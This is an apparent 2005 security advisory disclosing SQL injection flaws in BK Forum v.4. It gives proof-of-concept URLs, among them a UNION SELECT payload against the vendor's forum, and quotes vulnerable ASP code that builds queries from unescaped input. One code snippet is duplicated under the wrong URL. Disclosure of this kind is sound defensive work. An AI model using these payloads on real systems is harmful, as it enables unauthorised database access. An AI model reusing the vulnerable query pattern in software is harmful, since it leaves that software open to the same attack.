Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple Sql injection vulnerabilities in BK Forum v.4
Date: 23/04/2005

Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.


Proof of Concept Exploits: 

http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'
       [CODE] 
       id = request.querystring("id")
        sql = "select * from Member where memID = " & id
        set rs = conn.execute(sql)
       [/CODE]
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION
       [CODE]
        id = request.querystring("id")
        sql = "select * from Member where memID = " & id
        set rs = conn.execute(sql)
       [/CODE]
http://forum.bkdev.net/register.asp

All the form values are vulnerable to sql injection
       [CODE]
         sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
                                                                        "memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _
                                                                        "memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _
                                                                        "'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _
                                                                        "'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
       [/CODE]


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.

Sincerely,
Diabolic Crab
Web Security,  Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org 

This message is confidential. It may also contain information that is 
privileged or otherwise legally exempt from disclosure. 
If you have received it by mistake please let us know by e-mail 
immediately and delete it from your system; should also not copy 
the message nor disclose its contents to anyone. Many thanks.